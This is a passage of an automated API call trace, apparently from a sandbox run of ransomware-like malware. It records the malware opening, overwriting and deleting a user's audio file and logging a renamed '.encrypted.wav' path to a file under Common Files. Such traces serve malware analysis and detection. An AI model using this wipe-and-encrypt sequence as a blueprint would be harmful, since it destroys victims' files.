lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.743] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0038.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.744] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0038.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0038.745] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0038.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebd1f00, ftCreationTime.dwHighDateTime=0x1d5bbf4, ftLastAccessTime.dwLowDateTime=0x9a6973d0, ftLastAccessTime.dwHighDateTime=0x1d5bdff, ftLastWriteTime.dwLowDateTime=0x9a6973d0, ftLastWriteTime.dwHighDateTime=0x1d5bdff, nFileSizeHigh=0x0, nFileSizeLow=0x8acf, dwReserved0=0x0, dwReserved1=0x777648, cFileName="6YdESMaDUlc.wav", cAlternateFileName="6YDESM~1.WAV")) returned 0x7c2240 [0038.745] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0038.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.745] CharLowerBuffW (in: lpsz="byte[35535]", cchLength=0xb | out: lpsz="byte[35535]") returned 0xb [0038.745] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.745] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.746] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.746] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.747] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.747] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.747] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.747] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\6ydesmadulc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0038.747] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.748] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.748] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.748] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.748] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.749] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.749] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.749] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.749] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav", lpFilePart=0x0) returned 0x46 [0038.749] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebd1f00, ftCreationTime.dwHighDateTime=0x1d5bbf4, ftLastAccessTime.dwLowDateTime=0x9a6973d0, ftLastAccessTime.dwHighDateTime=0x1d5bdff, ftLastWriteTime.dwLowDateTime=0x16cddc00, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x8acf, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="6YdESMaDUlc.wav", cAlternateFileName="6YDESM~1.WAV")) returned 0x7c2240 [0038.749] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\6ydesmadulc.wav")) returned 1 [0038.750] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebd1f00, ftCreationTime.dwHighDateTime=0x1d5bbf4, ftLastAccessTime.dwLowDateTime=0x9a6973d0, ftLastAccessTime.dwHighDateTime=0x1d5bdff, ftLastWriteTime.dwLowDateTime=0x16cddc00, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x8acf, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="6YdESMaDUlc.wav", cAlternateFileName="6YDESM~1.WAV")) returned 0 [0038.750] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.750] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.750] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0038.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.751] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.751] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.751] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.751] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.751] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.751] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.751] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.751] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.751] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0038.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.751] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.752] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.752] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.752] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.752] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.752] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.752] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.752] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2667, lpOverlapped=0x0) returned 1 [0038.752] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.752] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2667, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.752] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.encrypted.wav\r\n", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0038.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x53) returned 0x794b90 [0038.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.encrypted.wav\r\n", cchWideChar=83, lpMultiByteStr=0x794b90, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\6YdESMaDUlc.encrypted.wav\r\n", lpUsedDefaultChar=0x0) returned 83 [0038.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0038.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0038.753] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x52, lpOverlapped=0x0) returned 1 [0038.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0038.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.753] CloseHandle (hObject=0x128) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.754] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.754] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0038.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 